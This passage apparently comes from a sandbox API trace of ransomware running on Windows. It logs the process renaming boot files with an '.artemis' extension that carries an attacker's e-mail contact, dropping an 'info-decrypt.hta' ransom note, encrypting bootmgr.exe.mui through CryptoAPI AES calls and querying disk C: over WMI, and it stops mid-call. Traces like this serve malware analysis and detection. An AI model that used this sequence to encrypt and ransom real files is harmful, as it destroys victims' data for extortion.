[0192.394] GetFullPathNameW (in: lpFileName="C:\\Boot\\memtest.exe.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\memtest.exe.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3e [0192.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f528) returned 1 [0192.394] GetFileAttributesExW (in: lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), fInfoLevelId=0x0, lpFileInformation=0x689f5a4 | out: lpFileInformation=0x689f5a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980)) returned 1 [0192.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f524) returned 1 [0192.394] MoveFileW (lpExistingFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), lpNewFileName="C:\\Boot\\memtest.exe.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\memtest.exe.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0192.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0192.397] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0192.397] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0192.397] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b5b0 [0192.397] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.398] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0192.398] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0192.398] FindClose (in: hFindFile=0x77b5b0 | out: hFindFile=0x77b5b0) returned 1 [0192.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0192.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0192.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f65c) returned 1 [0192.398] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0192.398] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x689f138, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0192.398] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x689f384 | out: lpFindFileData=0x689f384*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b5b0 [0192.399] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.399] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0192.399] FindNextFileW (in: hFindFile=0x77b5b0, lpFindFileData=0x689f394 | out: lpFindFileData=0x689f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0192.399] FindClose (in: hFindFile=0x77b5b0 | out: hFindFile=0x77b5b0) returned 1 [0192.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f61c) returned 1 [0192.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f628) returned 1 [0192.399] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0192.400] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0192.400] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f11c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0192.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f57c) returned 1 [0192.400] GetFileAttributesExW (in: lpFileName="C:\\Boot\\cs-CZ\\info-decrypt.hta" (normalized: "c:\\boot\\cs-cz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f5f8 | out: lpFileInformation=0x689f5f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0192.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f578) returned 1 [0192.400] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f114, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0192.400] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0192.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b0) returned 1 [0192.400] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\info-decrypt.hta" (normalized: "c:\\boot\\cs-cz\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x460 [0192.401] GetFileType (hFile=0x460) returned 0x1 [0192.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4ac) returned 1 [0192.401] GetFileType (hFile=0x460) returned 0x1 [0192.401] WriteFile (in: hFile=0x460, lpBuffer=0x3476bb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x689f574, lpOverlapped=0x0 | out: lpBuffer=0x3476bb8*, lpNumberOfBytesWritten=0x689f574*=0x1000, lpOverlapped=0x0) returned 1 [0192.468] WriteFile (in: hFile=0x460, lpBuffer=0x3476bb8*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x689f548, lpOverlapped=0x0 | out: lpBuffer=0x3476bb8*, lpNumberOfBytesWritten=0x689f548*=0x557, lpOverlapped=0x0) returned 1 [0192.468] CloseHandle (hObject=0x460) returned 1 [0192.468] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689f098, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0192.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f544) returned 1 [0192.469] GetFileAttributesExW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3477bd4 | out: lpFileInformation=0x3477bd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50)) returned 1 [0192.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f540) returned 1 [0192.469] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0192.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f478) returned 1 [0192.469] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0192.469] GetFileType (hFile=0x460) returned 0x1 [0192.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f474) returned 1 [0192.469] GetFileType (hFile=0x460) returned 0x1 [0192.470] GetFileSize (in: hFile=0x460, lpFileSizeHigh=0x689f580 | out: lpFileSizeHigh=0x689f580*=0x0) returned 0x15c50 [0192.470] ReadFile (in: hFile=0x460, lpBuffer=0x5311e60, nNumberOfBytesToRead=0x15c50, lpNumberOfBytesRead=0x689f52c, lpOverlapped=0x0 | out: lpBuffer=0x5311e60*, lpNumberOfBytesRead=0x689f52c*=0x15c50, lpOverlapped=0x0) returned 1 [0192.521] CloseHandle (hObject=0x460) returned 1 [0192.522] CryptAcquireContextW (in: phProv=0x689f4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f4cc*=0x7a9c18) returned 1 [0192.523] CryptGenRandom (in: hProv=0x7a9c18, dwLen=0x10, pbBuffer=0x347a420 | out: pbBuffer=0x347a420) returned 1 [0193.364] CryptImportKey (in: hProv=0x7a9c18, pbData=0x3587780, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f49c | out: phKey=0x689f49c*=0x77b5b0) returned 1 [0193.364] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.364] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.364] CryptDuplicateKey (in: hKey=0x77b5b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f48c | out: phKey=0x689f48c*=0x77aeb0) returned 1 [0193.364] CryptContextAddRef (hProv=0x7a9c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.364] CryptSetKeyParam (hKey=0x77aeb0, dwParam=0x4, pbData=0x3587860*=0x1, dwFlags=0x0) returned 1 [0193.364] CryptSetKeyParam (hKey=0x77aeb0, dwParam=0x1, pbData=0x358782c, dwFlags=0x0) returned 1 [0193.365] CryptEncrypt (in: hKey=0x77aeb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5327ad0*, pdwDataLen=0x689f4f8*=0x15c60, dwBufLen=0x15c60 | out: pbData=0x5327ad0*, pdwDataLen=0x689f4f8*=0x15c60) returned 1 [0193.366] CryptEncrypt (in: hKey=0x77aeb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3587888*, pdwDataLen=0x689f500*=0x0, dwBufLen=0x10 | out: pbData=0x3587888*, pdwDataLen=0x689f500*=0x10) returned 1 [0193.370] CryptDestroyKey (hKey=0x77b5b0) returned 1 [0193.370] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0193.370] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0193.370] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x689ef70, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0193.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f464) returned 1 [0193.370] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0193.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2a0) returned 1 [0193.372] CoTaskMemAlloc (cb=0x20c) returned 0x70ba28 [0193.372] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x70ba28 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0193.372] CoTaskMemFree (pv=0x70ba28) [0193.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689ef58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0193.372] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4a0 | out: ppv=0x689f4a0*=0x72015c) returned 0x0 [0193.373] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f498 | out: pAptType=0x689f498*=1) returned 0x0 [0193.373] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f49c | out: ppvObject=0x689f49c*=0x0) returned 0x80004002 [0193.373] IUnknown:Release (This=0x72015c) returned 0x1 [0193.374] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee08 | out: ppv=0x689ee08*=0x6737048) returned 0x0 [0193.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f020 | out: ppvObject=0x689f020*=0x0) returned 0x80004002 [0193.374] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737048, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f034 | out: ppvObject=0x689f034*=0x67387e0) returned 0x0 [0193.374] WbemDefPath:IUnknown:Release (This=0x6737048) returned 0x0 [0193.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec54 | out: ppvObject=0x689ec54*=0x67387e0) returned 0x0 [0193.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec10 | out: ppvObject=0x689ec10*=0x0) returned 0x80004002 [0193.374] WbemDefPath:IUnknown:AddRef (This=0x67387e0) returned 0x3 [0193.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0193.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e51c | out: ppvObject=0x689e51c*=0x0) returned 0x80004002 [0193.374] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e528 | out: ppvObject=0x689e528*=0x9820e38) returned 0x0 [0193.374] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820e38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e530 | out: pCid=0x689e530*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.374] WbemDefPath:IUnknown:Release (This=0x9820e38) returned 0x3 [0193.374] CoGetContextToken (in: pToken=0x689e588 | out: pToken=0x689e588) returned 0x0 [0193.375] CoGetContextToken (in: pToken=0x689e990 | out: pToken=0x689e990) returned 0x0 [0193.375] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea20 | out: ppvObject=0x689ea20*=0x0) returned 0x80004002 [0193.375] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x2 [0193.375] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x1 [0193.375] CoGetContextToken (in: pToken=0x689f318 | out: pToken=0x689f318) returned 0x0 [0193.375] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0193.375] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x689f348*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f344 | out: ppvObject=0x689f344*=0x67387e0) returned 0x0 [0193.375] WbemDefPath:IUnknown:AddRef (This=0x67387e0) returned 0x3 [0193.375] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x2 [0193.375] WbemDefPath:IWbemPath:SetText (This=0x67387e0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x689f4c8*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c8*=0x20, pszText=0x0) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x689f4c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f4c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x689f4cc | out: puCount=0x689f4cc*=0x0) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x689f4d4 | out: puResponse=0x689f4d4*=0xc19) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x689f44c | out: puCount=0x689f44c*=0x0) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f438 | out: puCount=0x689f438*=0x2) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0x0, pszText=0x0 | out: puBuffLength=0x689f434*=0xf, pszText=0x0) returned 0x0 [0193.375] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f434*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f434*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.375] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f3e8 | out: ppv=0x689f3e8*=0x72015c) returned 0x0 [0193.375] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f3e0 | out: pAptType=0x689f3e0*=1) returned 0x0 [0193.376] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f3e4 | out: ppvObject=0x689f3e4*=0x0) returned 0x80004002 [0193.376] IUnknown:Release (This=0x72015c) returned 0x1 [0193.388] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ed50 | out: ppv=0x689ed50*=0x6736e58) returned 0x0 [0193.388] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e58, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ef68 | out: ppvObject=0x689ef68*=0x0) returned 0x80004002 [0193.388] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e58, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ef7c | out: ppvObject=0x689ef7c*=0x6738850) returned 0x0 [0193.388] WbemDefPath:IUnknown:Release (This=0x6736e58) returned 0x0 [0193.388] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eb9c | out: ppvObject=0x689eb9c*=0x6738850) returned 0x0 [0193.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eb58 | out: ppvObject=0x689eb58*=0x0) returned 0x80004002 [0193.389] WbemDefPath:IUnknown:AddRef (This=0x6738850) returned 0x3 [0193.389] 